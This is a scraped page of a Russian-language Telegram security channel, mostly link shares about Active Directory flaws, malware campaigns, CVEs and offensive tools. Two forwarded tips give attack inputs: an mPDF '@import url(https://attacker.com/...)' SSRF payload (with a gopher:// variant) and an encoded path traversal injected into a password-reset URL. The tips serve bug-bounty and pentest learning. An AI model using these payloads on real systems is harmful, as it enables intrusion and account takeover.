Fsecurity | HH
@HelloHackingTeam
2.09K subscribers
1.72K photos
105 videos
62 files
6.15K links
Канал про ИБ
Наш Discord: https://discord.gg/Eg8aDS7Hn7
Пожертвовать:
> https://www.donationalerts.com/r/xackapb
Download Telegram
About
Blog
Apps
Platform
Join
Fsecurity | HH
2.09K subscribers
Fsecurity | HH
Хабр
Типичные ошибки настройки Active Directory
Всем привет! На связи Карпенко Савелий, специалист по тестированию на проникновение из группы по борьбе с уязвимостями в компании ТехВилл. В рамках нашей работы мы регулярно тестируем Active Directory...
🔗Ссылка:
https://habr.com/ru/companies/vkusvill/articles/1010812/
125 views
Fsecurity | HH
Хабр
Security Week 2612: ненастоящая уязвимость в архивах ZIP
На прошлой неделе исследователь Крис Азиз опубликовал информацию о новом способе обхода систем безопасности, якобы позволяющем протаскивать вредоносное ПО под видом обычного ZIP-архива. В свойствах...
🔗Ссылка:
https://habr.com/ru/companies/kaspersky/articles/1010894/
132 views
Fsecurity | HH
inti.io
How I infiltrated phishing panels targeting European banks and tracked down their operators
Good phishers clearly aren't always good programmers.
🔗Ссылка:
https://inti.io/p/how-i-infiltrated-phishing-panels
121 views
Fsecurity | HH
Securelist
How we uncovered a Horabot campaign and how you can detect this malware
Kaspersky SOC uncovered and analyzed a complex Horabot campaign in Mexico. In this article we share insights into how it is unleashed and how to hunt for this threat.
🔗Ссылка:
https://securelist.com/horabot-campaign/119033/
2
140 views
Fsecurity | HH
www.opennet.ru
Уязвимости в snapd и Rust Сoreutils, позволяющие получить root-привилегии в Ubuntu
Компания Qualys выявила уязвимость (CVE-2026-3888) в организации работы связки snap-confine и systemd-tmpfiles в Ubuntu, позволяющую непривилегированному пользователю получить root-доступ к системе. Проблема проявляется в Ubuntu в конфигурации по умолчанию…
🔗Ссылка:
https://opennet.ru/65014/
142 views
Fsecurity | HH
GitHub
GitHub - nikaiw/VMkatz: Extract Windows credentials directly from VM memory snapshots and virtual disks
Extract Windows credentials directly from VM memory snapshots and virtual disks - nikaiw/VMkatz
🔗Ссылка:
https://github.com/nikaiw/VMkatz
147 views
Fsecurity | HH
GitHub
GitHub - andreisss/KslDump: KslDump — Why bring your own knife when Defender already left one in the kitchen?
KslDump — Why bring your own knife when Defender already left one in the kitchen? - andreisss/KslDump
🔗Ссылка:
https://github.com/andreisss/KslDump
147 views
Fsecurity | HH
Google Cloud Blog
Ransomware Tactics, Techniques, and Procedures in a Shifting Threat Landscape | Google Cloud Blog
An overview of the ransomware landscape and common TTPs directly observed in 2025 ransomware incidents.
🔗Ссылка:
https://cloud.google.com/blog/topics/threat-intelligence/ransomware-ttps-shifting-threat-landscape
131 views
Fsecurity | HH
GitHub
GitHub - AD-Security/AD_Miner: AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the…
AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses - AD-Security/AD_Miner
🔗Ссылка:
https://github.com/AD-Security/AD_Miner
120 views
Fsecurity | HH
Хабр
«Антивирус мёртв. Да здравствует антивирус!»
Сегодня классический антивирус то и дело списывают в утиль. Дескать, «это театр безопасности», «он бессилен против таргетированной атаки», «да его студент обойдет в два счета». Что же, антивирус и...
🔗Ссылка:
https://habr.com/ru/companies/bastion/articles/989084/
116 views
Fsecurity | HH
SecurityLab.ru
Telnet: "Введите логин, пожалуйста" — хакер: "Спасибо, но я уже root". Вторая критическая дыра за два месяца, CISA уже фиксирует…
Одно подключение = полный контроль.
🔗Ссылка:
https://www.securitylab.ru/news/570502.php
123 views
Fsecurity | HH
GitHub
GitHub - ynsmroztas/AndroHunter: AndroHunter
AndroHunter. Contribute to ynsmroztas/AndroHunter development by creating an account on GitHub.
🔗Ссылка:
https://github.com/ynsmroztas/AndroHunter
113 views
Fsecurity | HH
Cymulate
Kerberos Authentication Relay Via CNAME Abuse 
Cymulate Research reveals a Kerberos relay technique abusing DNS CNAMEs to enable user impersonation, lateral movement, and RCE in Windows environments.
🔗Ссылка:
https://cymulate.com/blog/kerberos-authentication-relay-via-cname-abuse/
114 views
Fsecurity | HH
Forwarded from SHADOW:Group
У mPDF есть интересная особенность, которая может вам когда-нибудь пригодиться. Если передать движку строку с @import url(...), он делает внешний запрос, даже если HTML полностью экранирован htmlentities() и даже без <style>.

Причина проста: mPDF ищет URL-ы через регулярки по всему входу. Поэтому достаточно вставить:

@import url(https://attacker.com/test?.css)

и сервер сразу пойдёт по указанному адресу. Плюс можно использовать и нестандартные протоколы вроде gopher://, превращая это в SSRF с возможностью дергать внутренние сервисы.

Вендор же официально заявил, что это не баг, а фича, и устранять поведение не собирается - по их мнению, движок должен загружать указанные URL, а ответственность за реализацию лежит на разработчиках.

#web #ssrf #pdf
127 views
Fsecurity | HH
SecurityLab.ru
Ваш iPhone обновлён до последней версии iOS? Если нет — DarkSword уже может получить доступ к вашим данным и криптокошельку
Исследователи Google, iVerify и Lookout обнаружили новый набор эксплойтов для iPhone.
🔗Ссылка:
https://www.securitylab.ru/news/570569.php
138 views
Fsecurity | HH
Хабр
Атаки на цепочку поставки ПО: виды угроз и как с ними бороться
Атаки на цепочку поставки – одна из самых устойчивых угроз для разработки программного обеспечения. По итогам OWASP Top Ten, в 2025 году проблемы с цепочкой поставки заняли третью позицию в рейтинге...
🔗Ссылка:
https://habr.com/ru/companies/codescoring/articles/1011358/
132 views
Fsecurity | HH
Хабр
Как работают BYOVD-атаки на ядро Windows через драйверы и как от них защититься: большой разбор
Вы настроили Sysmon, у вас работает EDR, события летят в SIEM. Создаётся процесс, вы видите Event ID 1. Загружается DLL, Event ID 7. Всё под контролем. А теперь кто-то загружает в систему один...
🔗Ссылка:
https://habr.com/ru/companies/alfa/articles/1011302/
130 views
Fsecurity | HH
Хабр
У нас тут крыса: троян Remcos RAT распространяют через фишинговые письма
В начале марта специалисты центра мониторинга и реагирования GSOC компании «Газинформсервис» зафиксировали масштабную фишинговую кампанию: злоумышленники рассылают письма с заражённым Excel-файлом. Он...
🔗Ссылка:
https://habr.com/ru/companies/gaz-is/articles/1009262/
120 views
Fsecurity | HH
Хабр
Держим руку на пульсе: мониторинг состояния Wazuh
Как известно, SIEM‑системы предназначены для обнаружения угроз и мониторинга безопасности, но при этом важно учитывать, что и сама SIEM является сложной распределенной...
🔗Ссылка:
https://habr.com/ru/companies/otus/articles/1010954/
121 views
Fsecurity | HH
Хабр
Миллион за сисадмина: как один айтишник может остановить компанию на неделю
Эта статья для собственников и директоров малого и среднего бизнеса, у которых в компании есть один ИТ-специалист или ИТ-лидер, отвечающий за все разом. Если сейчас уход такого человека — это...
🔗Ссылка:
https://habr.com/ru/companies/alp_itsm/articles/1012242/
112 views
Fsecurity | HH
Forwarded from 🕷 BugBountyRu
🕷 ServerClient-side path traversal: баги, основанные на маршрутизации на стороне клиента

Класс багов, связанный с обходом пути на клиенте, становится всё более актуальным.

Классический path traversal (../../../file) работает на сервере. Здесь идея та же, но на стороне клиента.

👉 Пользовательский ввод влияет на путь → меняется, куда приложение делает запрос или редирект.

💡 В чём суть

Если приложение использует пользовательский ввод для формирования пути — появляется точка атаки.

Пример — сброс пароля:
https://target.com/reset/token?user=victim&Token=810128475189


Если значение Token участвует в формировании пути или редиректа, его можно изменить:
https://target.com/reset/token?user=victim&Token=810128475189%2F..%2F..%2Fuser


В результате клиент сформирует запрос:
https://target.com/user


💥 Где появляется импакт

Сам по себе редирект может быть безобидным. Но как только он используется вместе с другими механизмами, появляется реальный импакт:

вместе с уязвимостью open redirect,
при загрузке ресурсов (CSS/JS),
в логике маршрутизации SPA,
при динамической подгрузке данных.

Ресерчи по теме:
🔗 Client-Side Path Traversal: From Session Deletion to Full Account Compromise
🔗 Client Side Path Manipulation
🔗 Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF
Please open Telegram to view this post
VIEW IN TELEGRAM
96 views